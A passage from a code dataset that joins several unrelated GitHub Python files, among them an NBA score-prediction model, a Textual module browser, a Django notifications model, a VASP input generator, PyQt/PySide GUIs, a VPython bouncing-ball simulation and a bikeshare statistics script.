current_stats[\n 'BLK'] - current_stats['PF'] - current_stats['TOV'])\n current_stats['CORE_PTS'] = base_points\n current_stats.iloc[:, 0:18] = current_stats.iloc[:, 0:18].ewm(halflife=7).mean()\n return current_stats\n\n\ndef getTeamStatsold(abv,latestdate):\n #edit this function for additional feature eng\n team_subset = df1[df1['TEAM_ABBREVIATION'] == abv].copy()\n # team_subset = df1[df1['TEAM_ABBREVIATION'] == 'ATL'].copy()\n # latestdate = '2000-01-19'\n team_subset['GAME_DATE'] = pd.to_datetime(team_subset['GAME_DATE'])\n team_subset.index = team_subset['GAME_DATE']\n team_subset.sort_index(inplace=True, ascending=False)\n colnames = team_subset.columns\n stats_columns = ['PTS', 'FGM', 'FGA', 'FG_PCT',\n 'FG3M', 'FG3A', 'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB',\n 'REB', 'AST', 'STL', 'BLK', 'TOV', 'PF']\n date_subset = team_subset[team_subset['GAME_DATE'] < latestdate].copy()\n date_subset['numerical_wins'] = np.where(date_subset['WL'] == 'L', 0, 1)\n date_subset['location'] = np.where(date_subset['MATCHUP'].str.contains('@'),-1,1)\n date_reversed = date_subset.iloc[::-1].copy()\n date_reversed['window_sum10'] = date_reversed['numerical_wins'].rolling(10).sum()\n date_reversed['window_sum5'] = date_reversed['numerical_wins'].rolling(5).sum()\n date_reversed['window_sum3'] = date_reversed['numerical_wins'].rolling(3).sum()\n stats_columns.extend(['window_sum10', 'window_sum5', 'window_sum3','location','numerical_wins'])\n date_subset = date_reversed.copy()\n\n current_stats = date_subset.iloc[-11:, [date_subset.columns.get_loc(c) for c in stats_columns]].copy()\n base_points = current_stats['PTS']\n current_stats['PIE'] = (\n current_stats['PTS'] + current_stats['FGM'] + current_stats['FTM'] - current_stats[\n 'FTA'] + current_stats['DREB'] +\n current_stats['OREB'] + current_stats['AST'] + current_stats['STL'] + current_stats[\n 'BLK'] - current_stats['PF'] - current_stats['TOV'])\n current_stats['CORE_PTS'] = base_points\n current_stats.iloc[:,0:18] = current_stats.iloc[:,0:18].ewm(halflife=7).mean()\n return current_stats\n\ndef getOverUnder(gameid):\n try:\n target_game = df1[df1['GAME_ID'] == gameid] # contains target\n # target_game = df1[df1['GAME_ID'] == 29900545] #contains target\n if target_game.shape[0] != 2:\n return None\n relevant_teams = target_game['TEAM_ABBREVIATION'].tolist()\n match_location_away = target_game.loc[target_game['MATCHUP'].str.contains('@')]\n match_location_home = target_game.loc[~target_game['MATCHUP'].str.contains('@')]\n target_game_date = match_location_home['GAME_DATE']\n # match_outcome_home = np.where(match_location_away['WL'] == 'W',0,1) #0 if away team wins\n spread = match_location_home.iloc[0, match_location_home.columns.get_loc('PTS')] + \\\n match_location_away.iloc[0, match_location_away.columns.get_loc('PTS')]\n game_date = match_location_away['GAME_DATE'].values[0]\n home_team = match_location_away['MATCHUP'].str.extract(r'((?<=@.)\\S{3})')[0].tolist()\n away_team = [x for x in relevant_teams if x not in home_team]\n home_df = getTeamStats(home_team[0], game_date)\n away_df = getTeamStats(away_team[0], game_date)\n # normalized_hdf = (home_df - home_df.min()) / (home_df.max() - home_df.min())\n # normalized_adf = (away_df - away_df.min()) / (away_df.max() - away_df.min())\n if home_df.shape == (11, 26) and away_df.shape == (11, 26):\n output = [target_game_date, spread, home_df, away_df]\n else:\n return None\n except:\n return None\n return output\n\n\ndef get_optimization(indf):\n all_games_ids = indf['GAME_ID'].unique()\n pool = get_context(\"fork\").Pool(22) #change to number of cores on machine\n optimization_result = pool.map(getOverUnder, all_games_ids)\n pool.close()\n return optimization_result\n\n\n#read in data\ndf1 = pd.read_csv(root_data_dir + 'gamedf.csv',index_col = 0)\n\n\noptimization_result = get_optimization(df1)\n\ncomplete_dataset = []\nfor val in optimization_result:\n if val != None :\n complete_dataset.append(val)\n\n\ntrain_labels = []\ntrain_features = []\ntest_labels = []\ntest_features = []\n\nfor r in range(0,len(complete_dataset)):\n print(r)\n if (pd.to_datetime(complete_dataset[r][0]) < '2020-01-01').bool():\n train_labels.append(complete_dataset[r][1])\n home_row = complete_dataset[r][2].to_numpy().flatten('F')\n away_row = complete_dataset[r][3].to_numpy().flatten('F')\n both_row = np.concatenate((home_row,away_row))\n train_features.append(both_row)\n else:\n test_labels.append(complete_dataset[r][1])\n home_row = complete_dataset[r][2].to_numpy().flatten('F')\n away_row = complete_dataset[r][3].to_numpy().flatten('F')\n both_row = np.concatenate((home_row,away_row))\n test_features.append(both_row)\n\nnum_features = 550\ntrain_labels = np.array(train_labels)\ntrain_features = np.array(train_features)\ntest_labels = np.array(test_labels)\ntest_features = np.array(test_features)\n\n#%%\ntrainlab = np.nan_to_num(train_labels)\ntrainset = np.nan_to_num(train_features)\ntestlab = np.nan_to_num(test_labels)\ntestset = np.nan_to_num(test_features)\n\nfrom tensorflow.keras.layers import Dense, Dropout,Conv1D, MaxPooling1D, Flatten, GlobalAvgPool1D\nfrom tensorflow.keras import Sequential\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport tensorflow as tf\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.regularizers import l1\n\n\n\nmodel = Sequential()\nmodel.add(Dense((num_features), input_dim=(num_features), activation='relu'))\n# model.add(Dropout(0.2))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\n# model.add(Dropout(0.4))\nmodel.add(Dense(1, activation='linear'))\nmodel.summary()\n\nmodel.compile(loss='mean_absolute_error', optimizer=optimizers.Adam(lr=0.000001), metrics=['mae'])\nearly_stop = tf.keras.callbacks.EarlyStopping(monitor='val_mae', patience=15)\n#\n# opt = SGD(lr=0.001, momentum=0.9)\n# model.compile(loss='binary_crossentropy', optimizer='Adam', metrics=['accuracy'])\n\n\nhistory = model.fit(trainset, trainlab, epochs=4000, batch_size=20000, callbacks=[early_stop],\n validation_split=.2,shuffle=False)\n\nfrom matplotlib import pyplot\npyplot.subplot(212)\npyplot.title('MAE')\npyplot.plot(history.history['mae'], label='train')\npyplot.plot(history.history['val_mae'], label='test')\npyplot.legend()\npyplot.show()\n\n\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\npredictions = model.predict(testset).flatten()\npred_df = pd.DataFrame([predictions,testlab]).T\npred_df.columns = ['predictions','labels']\nprint(mean_squared_error(pred_df['labels'], pred_df['predictions'], squared=False))\nprint(mean_absolute_error(pred_df['labels'], pred_df['predictions']))\n22.03\n17.17\n21.53\n16.80\n21.54\n16.69\n20.96\n16.39\n20.68\n16.2\n20.63\n16.18\n20.59\n16.12\n\n#bench\n20.27\n15.91\n\n#new bench\n20.18\n15.84\n\n\n\n#%%\ntrainlab = np.nan_to_num(train_labels)\ntrainset = np.nan_to_num(train_features)\ntestlab = np.nan_to_num(test_labels)\ntestset = np.nan_to_num(test_features)\n\n\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\ndtrain = xgb.DMatrix(trainset, label=trainlab)\n\nparams = {}\nparams['eval_metric'] = 'mae'\nparams['tree_method'] = 'gpu_hist'\n# params['colsample_bytree'] = .849\n# params['gamma'] = .07\nparams['learning_rate'] = .01\nparams['max_depth'] = 5\n# params['early_stopping_rounds'] = 30\nparams['objective'] = 'reg:squarederror'\n# params['scale_pos_weight'] = 2\n\n\nnum_round = 1200\n\nbst = xgb.train(params, dtrain,num_round)\n\n\ndtest = xgb.DMatrix(testset)\npredictions = bst.predict(dtest)\npred_df = pd.DataFrame([predictions,test_labels]).transpose()\npred_df.columns = ['predictions','labels']\nprint(mean_squared_error(pred_df['labels'], pred_df['predictions'], squared=False))\nprint(mean_absolute_error(pred_df['labels'], pred_df['predictions']))","repo_name":"davidsanchez222/nba_bets","sub_path":"models/danny_feature_engineering.py","file_name":"danny_feature_engineering.py","file_ext":"py","file_size_in_byte":10571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73231434458","text":"import importlib\nimport inspect\nimport pkgutil\n\nfrom textual import events\nfrom textual.app import App, ComposeResult\nfrom textual.containers import Container, Horizontal\nfrom textual.widgets import Static\n\nfrom shira._object_panel import ObjectPanel\nfrom shira._search import SearchBar, SearchCompletion, CompletionCandidate\n\nNOT_FOUND = \"poi12zn@$][]daza\"\n\n\nclass Shira(App):\n def compose(self) -> ComposeResult:\n self.modules = {module.name: module for module in pkgutil.iter_modules()}\n self.original_candidates = [\n CompletionCandidate(\n primary=module.name,\n secondary=\"pkg\" if module.ispkg else \"mod\",\n original_object=module,\n )\n for module in self.modules.values()\n ]\n yield Horizontal(\n Static(\">\", id=\"search-prompt\"),\n SearchBar(id=\"search-input\"),\n id=\"search-bar-container\",\n )\n yield Container(\n SearchCompletion(\n candidates=self.original_candidates,\n id=\"search-completion\",\n ),\n id=\"search-completion-container\",\n )\n yield Container(\n ObjectPanel(id=\"object-panel\"),\n id=\"body-container\",\n )\n\n def on_mount(self, event: events.Mount) -> None:\n self.query_one(\"#search-input\").focus()\n\n def on_search_bar_updated(self, event: SearchBar.Updated) -> None:\n completion = self.app.query_one(SearchCompletion)\n\n value = event.value\n if len(value) < 2:\n completion.parent.display = False\n return\n\n cursor_position = event.cursor_position\n\n # Fill up the list of candidates\n # How do we determine the candidates?\n # Active object should be the right-most resolvable part in the string\n # The left-most part should look in the self.modules to kick off the search.\n # TODO: Cache active objects, don't naively reset it each time if it's the\n # same as it was before\n parts = [part for part in value.split(\".\")]\n\n object_panel = self.query_one(\"#object-panel\", ObjectPanel)\n search_part = \"\"\n if len(parts) == 0:\n # If we're empty, then there should be no candidates\n completion.update_candidates([])\n elif len(parts) == 1:\n # If there's only one part, then we're searching for module_name in self.modules\n module_name = parts[0]\n\n # Trim down the candidate list to those containing the query string\n candidates = []\n for candidate in self.original_candidates:\n if module_name in candidate.primary:\n candidates.append(candidate)\n if module_name == candidate.primary:\n object_panel.active_object = candidate.original_object\n\n # Update the dropdown list with the new candidates\n completion.update_candidates(candidates)\n # Tell the dropdown list about the part to use for highlighting matching candidates\n # Since there's only 1 part, we don't need to do anything tricky here\n search_part = module_name\n else:\n # We have multiple parts now, so finding our list of candidates is more complex\n # We'll look through the parts to get to the rightmost valid part BEFORE the cursor position.\n module_name = parts[0]\n other_parts = parts[1:]\n\n search_input = self.query_one(\"#search-input\", SearchBar)\n cursor_position = search_input.cursor_position\n\n # Now we need to get into a scenario where we have an object that we wish to search,\n # and a search string to apply to it\n object_to_search = self.modules.get(module_name)\n\n if object_to_search is None:\n completion.update_candidates([])\n else:\n # TODO: We should update this loop to only go up to the cursor position\n search_part = \"\"\n for part in other_parts:\n if part == \"\":\n break\n\n if isinstance(object_to_search, pkgutil.ModuleInfo):\n object_to_search = importlib.import_module(\n object_to_search.name\n )\n\n # Look for this part on the current object to search\n object_dict = getattr(object_to_search, \"__dict__\", None)\n if object_dict is None:\n completion.update_candidates([])\n break\n\n obj = object_dict.get(part, NOT_FOUND)\n if obj == NOT_FOUND:\n search_part = part\n break\n else:\n object_to_search = obj\n\n if object_to_search is not None:\n if isinstance(object_to_search, pkgutil.ModuleInfo):\n object_to_search = importlib.import_module(\n object_to_search.name\n )\n\n if hasattr(object_to_search, \"__dict__\"):\n new_candidates = []\n for name, obj in object_to_search.__dict__.items():\n print(obj, getattr(obj, \"__package__\", None))\n if name.startswith(\"__\") and name.endswith(\"__\"):\n continue\n\n is_module = inspect.ismodule(obj)\n if is_module and getattr(\n obj, \"__package__\", \"-x-\"\n ) == getattr(object_to_search, \"__package__\", \"-y-\"):\n new_candidates.append(\n CompletionCandidate(\n name, \"mod\", original_object=obj\n )\n )\n elif not is_module:\n obj_module = inspect.getmodule(obj)\n if inspect.ismodule(object_to_search):\n include = obj_module is object_to_search\n else:\n include = obj_module is inspect.getmodule(\n object_to_search\n )\n\n if include:\n new_candidates.append(\n CompletionCandidate(\n name, None, original_object=obj\n )\n )\n\n # If it's a module, include if it has same __package__\n # If it's not a module, include if in same module\n\n completion.update_candidates(new_candidates)\n\n object_panel.active_object = object_to_search\n\n # The search bar has updated, so lets update the completion dropdown\n # First, align it with the cursor position\n completion_parent = self.app.query_one(\"#search-completion-container\")\n top, right, bottom, left = completion_parent.styles.margin\n completion_parent.styles.margin = (\n top,\n right,\n bottom,\n cursor_position + 3,\n )\n completion.filter = search_part\n completion.highlight_index = completion.highlight_index\n\n\napp = Shira(css_path=\"shira.scss\")\n\n\ndef run():\n app.run()\n","repo_name":"darrenburns/shira","sub_path":"shira/shira.py","file_name":"shira.py","file_ext":"py","file_size_in_byte":7751,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"68"} +{"seq_id":"39532220313","text":"from django.db import models\nfrom cse312.users.models import User\nfrom cse312.message.models import ChatMessage\n\nclass Notifications(models.Model):\n user = models.ForeignKey(User, related_name=\"main_user\", null=True, on_delete=models.CASCADE)\n sender = models.ForeignKey(User, related_name=\"sending_user\", null=True, on_delete=models.CASCADE)\n message = models.ManyToManyField(ChatMessage)\n\n @classmethod\n def add(cls, user, sender, message):\n notifications, created = cls.objects.get_or_create(\n user = user,\n sender = sender\n )\n notifications.message.add(message)\n\n @classmethod\n def remove(cls, user, sender, message):\n notifications, created = cls.objects.get_or_create(\n user = user,\n sender = sender\n )\n notifications.delete()\n\n def get_count(self):\n return self.message.all().count()\n\n def get_message(self):\n if self.get_count() > 0:\n return self.message.all()[0]","repo_name":"lawzeem/CircleSocial","sub_path":"cse312/cse312/notifications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21664503172","text":"import os\nos.environ['PMG_VASP_PSP_DIR'] = 'D:\\\\Users\\\\RyanTrottier\\\\Documents\\\\Scrap\\\\PMG'\nos.environ['VASP_PSP_DIR'] = 'D:\\\\Users\\\\RyanTrottier\\\\Documents\\\\Scrap\\\\PMG'\nimport All_Materials\n# from All_Materials import done,csv_dict,mat_dict\nfrom ZachsMaterials import done, mat_dict\nfrom AddDB import load_db\nfrom Database_Tools import *\nfrom Classes_Pymatgen import *\nimport pymongo\nimport numpy as np\n\n#%%\nl = 7\nmatch_criteria = {\n # 'pathway_count': {'$exists' : False},\n # 'defect_type': {'$exists' : False},\n # 'ts_type': {'$exists' : False},\n 'labels' : {'$all' : ['unit_cell'],\n '$nin' : ['surface']}\n # 'poscar.structure.lattice.a': {'$lt': l},\n}\n\nfolder = 'D:\\\\Users\\\\RyanTrottier\\\\Documents\\\\Scrap\\\\lobsters'\n(db,fs,client) = load_db()\n\n# for material in csv_dict.materials.keys():\nfor material in mat_dict.keys():\n material = material.lower()\n# for material in ['bicoo3']:\n# match_criteria['material'] = {'$all': [material], '$nin' : ['from_zach']}\n match_criteria['material'] = {'$all': [material] + ['from_zach']}\n runs = list(db.database.find(match_criteria).sort('energy', pymongo.ASCENDING))\n\n if 'ICOHPLIST_lobster' in runs[0]:\n continue\n print(\"{}: {}\".format(material, len(runs)))\n if len(runs) > 0:\n [print(x['energy']) for x in runs]\n if len(runs) >= 1:\n run = runs[0]\n material_folder = os.path.join(folder, material)\n os.makedirs(material_folder, exist_ok=True)\n incar = Incar.from_dict(run['incar'])\n temp = get_file(fs, run['outcar'])\n magmom = [np.round(x['tot'],1) for x in Outcar(temp).magnetization]\n os.remove(temp)\n incar['MAGMOM'] = magmom\n incar['SYSTEM'] = material\n incar['KPAR'] = 3\n incar['NPAR'] = 3\n incar.write_file(os.path.join(material_folder, 'INCAR'))\n Kpoints.from_dict(run['kpoints']).write_file(os.path.join(material_folder, 'KPOINTS'))\n Poscar.from_dict(run['poscar']).write_file(os.path.join(material_folder, 'POSCAR'))\n Potcar(run['potcar']).write_file(os.path.join(material_folder, 'POTCAR'))\n with open(os.path.join(material_folder, 'DATABASE'), 'w') as f:\n f.write('''material {}\nrelaxation\nunit_cell'''.format(' '.join(run['material'])))","repo_name":"rtrottie/materials","sub_path":"make lobsters.py","file_name":"make lobsters.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4046910313","text":"import sys\nimport os\n\n\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QDialog, QPushButton\nfrom PySide2.QtCore import QFile\nfrom PySide2.QtUiTools import QUiLoader\n\nclass DeviceSelector(QDialog):\n def __init__(self):\n super().__init__()\n self.ui = QUiLoader().load(\"deviceselector.ui\")\n self.ui.show()\n self.closebutton = self.ui.findChild(QPushButton, \"dialogCloseButton\")\n self.closebutton.clicked.connect(self.ui.close)\n\nclass TAPmain(QMainWindow):\n def __init__(self):\n super().__init__()\n self.ui = QUiLoader().load(\"form.ui\")\n self.ui.show()\n self.initSettingsButton()\n\n def initSettingsButton(self):\n self.button = self.ui.findChild(QPushButton, \"selectDevicesButton\")\n self.button.clicked.connect(self.openDeviceSelector)\n \n def openDeviceSelector(self):\n self.devselector = DeviceSelector()\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = TAPmain()\n sys.exit(app.exec_())\n","repo_name":"juusolain/TimecodeAudioPlayer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21531030682","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nimport database as db\nimport css\n\n\nclass ProductListPage(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Product List\")\n self.resize(800, 600)\n\n self.logo = QtWidgets.QLabel(self)\n self.logo.setGeometry(QtCore.QRect(0, 0, 181, 111))\n self.logo.setPixmap(QtGui.QPixmap(\"./src/s_icon-nbg.png\"))\n self.logo.setObjectName(\"logo\")\n self.logo.mousePressEvent = lambda event: self.goToMainShop(\"CL00\")\n\n self.Header = QtWidgets.QLabel(self)\n self.Header.setGeometry(QtCore.QRect(240, 30, 481, 51))\n self.Header.setObjectName(\"Header\")\n self.Header.setAlignment(QtCore.Qt.AlignCenter)\n self.Header.setText(\"Welcome to Main Shop\")\n\n self.layout = QtWidgets.QVBoxLayout(self)\n\n self.tableWidget = QtWidgets.QTableWidget(self)\n self.tableWidget.setColumnCount(5)\n self.tableWidget.setHorizontalHeaderLabels([\"PRid\", \"Title\", \"Price\", \"Description\", \"Active\"])\n\n self.loadProducts()\n self.loadCSS()\n\n self.layout.addWidget(self.logo)\n self.layout.addWidget(self.Header)\n self.layout.addWidget(self.tableWidget)\n\n def loadCSS(self):\n style_sheet = f\"\"\"\n QLabel#Header{{\n {css.label_stylesheet_header}\n }}\n QPushButton{{\n {css.push_button_stylesheet_red_min}\n }}\n\n \"\"\"\n\n self.setStyleSheet(style_sheet)\n\n def loadProducts(self):\n products = db.showAllProduct()\n self.tableWidget.setRowCount(len(products))\n\n for row, product in enumerate(products):\n PRidItem = QtWidgets.QTableWidgetItem(str(product[0]))\n titleItem = QtWidgets.QTableWidgetItem(str(product[1]))\n price = \"{:,}\".format(int(product[2]))\n\n priceItem = QtWidgets.QTableWidgetItem(str(price))\n descriptionItem = QtWidgets.QTableWidgetItem(str(product[3]))\n activeItem = QtWidgets.QTableWidgetItem(str(product[4]))\n\n self.tableWidget.setItem(row, 0, PRidItem)\n self.tableWidget.setItem(row, 1, titleItem)\n self.tableWidget.setItem(row, 2, priceItem)\n self.tableWidget.setItem(row, 3, descriptionItem)\n self.tableWidget.setItem(row, 4, activeItem)\n\n if product[4] == \"1\":\n activeItem.setFlags(QtCore.Qt.ItemIsEnabled)\n else:\n button = QtWidgets.QPushButton(\"Activate\")\n button.clicked.connect(lambda _, PRid=str(product[0]): self.activeProduct(PRid))\n self.tableWidget.setCellWidget(row, 4, button)\n\n self.tableWidget.resizeColumnsToContents()\n\n def activeProduct(self, PRid):\n success = db.activeProduct(PRid)\n if success:\n QtWidgets.QMessageBox.information(self, \"Confirmation\", \"Product has been activated.\")\n self.loadProducts()\n else:\n QtWidgets.QMessageBox.warning(self, \"Error\", \"Failed to activate product.\")\n\n def goToMainShop(self, CLid):\n from mainShop import MainShop\n self.close()\n self.mainShop = MainShop(CLid)\n self.mainShop.show()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication([])\n product_list_page = ProductListPage()\n product_list_page.show()\n app.exec_()\n","repo_name":"MG-530/online_shop_PYQT","sub_path":"ProductListPage.py","file_name":"ProductListPage.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15070355464","text":"from vpython import *\n#GlowScript 3.1 VPython\n#create our sphere\nball = sphere(pos=vector(-5,0,0), radius=0.5, color=color.green, make_trail=True)\nball2 = sphere(pos=vector(5,0,0), radius=0.5, color=color.yellow, make_trail=True)\n#create our wall, there are nine colors red, green, blue, yellow, magenta,\n#cyan, orange, black, and white.\nwallR = box(pos=vector(6,0,0), size=vector(.5,12,12.5), color=color.blue)\nwallL = box(pos=vector(-6,0,0), size=vector(.5,12,12.5), color=color.blue)\nwallBK = box(pos=vector(0,0,-6), size=vector(12,12,.5), color=color.red)\nwallT = box(pos=vector(0,6,0), size=vector(12.5,.5,12.5), color=color.green)\nwallBT = box(pos=vector(0,-6,0), size=vector(12.5,.5,12.5), color=color.green)\n#give our ball velocity\nball.velocity = vector(25,10,-12)\nball2.velocity = vector(15,15,7)\n#our dt is showing how much we are changing\ndt = 0.005\n#time starts at 0\nt = 0\n#velocity arrow visual with scaler to make arrow correct size\nvscale = 0.1\nvarr = arrow(pos=ball.pos, axis=vscale*ball.velocity, color=color.yellow)\nvarr2 = arrow(pos=ball2.pos, axis=vscale*ball2.velocity, color=color.yellow)\n#we update position based on velocity and change\nscene.autoscale = True \nwhile t<1000000:\n rate(100)\n randnum = random()\n# controls right and left wall bounce\n if (ball.pos.x + .5) > (wallR.pos.x - .5):\n ball.velocity.x = -ball.velocity.x\n ball.color=color.cyan\n if (ball.pos.x - .5) < (wallL.pos.x + .5):\n ball.velocity.x = -ball.velocity.x\n ball.color=color.green\n \n\n if (ball2.pos.x + .5) > (wallR.pos.x - .5):\n ball2.velocity.x = -ball2.velocity.x\n ball2.color=color.red\n if (ball2.pos.x - .5) < (wallL.pos.x + .5):\n ball2.velocity.x = -ball2.velocity.x\n ball2.color=color.yellow\n# controls front and back wall bounce \n if (ball.pos.z - .5) < (wallBK.pos.z + .5):\n ball.velocity.z = -ball.velocity.z\n ball.color=color.orange\n if (ball.pos.z + .5) > (-wallBK.pos.z - .5):\n ball.velocity.z = -ball.velocity.z\n ball.color=color.yellow\n \n if (ball2.pos.z - .5) < (wallBK.pos.z + .5):\n ball2.velocity.z = -ball2.velocity.z\n ball.color=color.purple\n if (ball2.pos.z + .5) > (-wallBK.pos.z - .5):\n ball2.velocity.z = -ball2.velocity.z\n ball.color=color.white\n# controls top and bottom wall bounce\n if (ball.pos.y + .5) > (wallT.pos.y - .5):\n ball.velocity.y = -ball.velocity.y\n ball.color=color.green\n if (ball.pos.y - .5) < (wallL.pos.x + .5):\n ball.velocity.y = -ball.velocity.y\n ball.color=color.green\n \n if (ball2.pos.y + .5) > (wallT.pos.y - .5):\n ball2.velocity.y = -ball2.velocity.y\n ball2.color=color.black\n if (ball2.pos.y - .5) < (wallL.pos.x + .5):\n ball2.velocity.y = -ball2.velocity.y\n ball2.color=color.cyan\n# updating balls position and arrrow position\n ball.pos = ball.pos + ball.velocity*dt\n varr.pos=ball.pos\n varr.axis=ball.velocity*vscale\n \n ball2.pos = ball2.pos + ball2.velocity*dt\n varr2.pos=ball2.pos\n varr2.axis=ball2.velocity*vscale\n t = t + dt\n \n","repo_name":"edwardb1203/Vpythonprojects","sub_path":"edwardunc1_vectorballpaths.py","file_name":"edwardunc1_vectorballpaths.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21438553929","text":" #Importing time, pandas and numpy libraries\nimport time\nimport pandas as pd\nimport numpy as np\n\n #City data dictionary for user input\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n #month and days data set\nmonths = ['january', 'february', 'march', 'april', 'may', 'june','all']\ndays = ['sunday','monday','tuesday','wednesday','thursday','friday','saturday','all']\n\n #function for parsing filters\ndef get_filters():\n \"\"\"\n Requests user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city = input(\"Enter the city :choices are {}\\n\".format(list(CITY_DATA.keys()))).lower()\n while city not in CITY_DATA:\n print(\"Invalid input\")\n city = input(\"Enter the city :choices are {}\\n\".format(list(CITY_DATA.keys()))).lower()\n continue\n\n # TO DO: get user input for month (all, january, february, ... , june)\n month = input(\"Enter month :choices are {}\\n\".format(months)).lower()\n while month not in months:\n print(\"Invalid input\")\n month = input(\"Enter the month :choices are {}\\n\".format(months)).lower()\n continue\n\n # TO DO: get user input for day of week (all, monday, tuesday, ... sunday)\n day = input(\"Enter the day :choices are {}\\n\".format(days)).lower()\n while day not in days:\n print(\"Invalid input\")\n day = input(\"Enter the day :choices are {}\\n\".format(days)).lower()\n continue\n\n print('-'*40)\n return city, month, day\n\n #Function definition for loading the data based on city, month and day\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day'] = df['Start Time'].dt.weekday_name\n\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month)+1\n\n # filter by month to create the new dataframe\n df = df.loc[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df.loc[df['day'] == day.title()]\n\n return df\n\n #define function for time stats\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel..........\\n')\n start_time = time.time()\n\n # TO DO: display the most common month\n common_month = df['month'].mode()[0]\n\n\n # TO DO: display the most common day of week\n common_day = df['day'].mode()[0]\n\n\n # TO DO: display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_start_hour = df['hour'].mode()[0]\n\n print(\"\\nThe common month, day and start hour respectively is \",common_month,common_day,common_start_hour)\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define function for station statistics\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # TO DO: display most commonly used start station\n common_start_station = df['Start Station'].mode()[0]\n\n\n # TO DO: display most commonly used end station\n common_end_station = df['End Station'].mode()[0]\n\n\n # TO DO: display most frequent combination of start station and end station trip\n df['combined_station'] = df['Start Station'] + df['End Station']\n common_combined_station = df['combined_station'].mode()[0]\n\n print(\"\\nThe common start station is\", common_start_station)\n print(\"\\nThe common end station is\", common_end_station)\n print(\"\\nThe common combined station is\", common_combined_station)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define function for statistics based on trip duration\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # TO DO: display total travel time\n total_travel_time = df['Trip Duration'].sum()\n\n\n # TO DO: display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n\n print('\\nThe total travel time is',total_travel_time)\n print('\\nThe mean travel time is',mean_travel_time)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define function for user based statistics\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats....\\n')\n start_time = time.time()\n\n # TO DO: Display counts of user types\n try:\n user_type = df['User Type'].value_counts()\n except KeyError:\n user_type = 'none (due to no data)'\n\n # TO DO: Display counts of gender\n try:\n gender_count = df['Gender'].value_counts()\n except KeyError:\n gender_count = 'none (due to no data)'\n\n\n # TO DO: Display earliest, most recent, and most common year of birth\n try:\n earliest_birth_year = df['Birth Year'].min()\n\n recent_birth_year = df['Birth Year'].max()\n\n common_birth_year = df['Birth Year'].mode()\n except KeyError:\n earliest_birth_year = 'none (due to no data)'\n recent_birth_year = 'none (due to no data)'\n common_birth_year = 'none (due to no data)'\n\n print('\\nThe user type is',user_type)\n print('\\nThe gender_count is',gender_count)\n print('\\nThe earliest birth year is',earliest_birth_year)\n print('\\nThe recent birth year is',recent_birth_year)\n print('\\nThe common birth year is',common_birth_year)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n 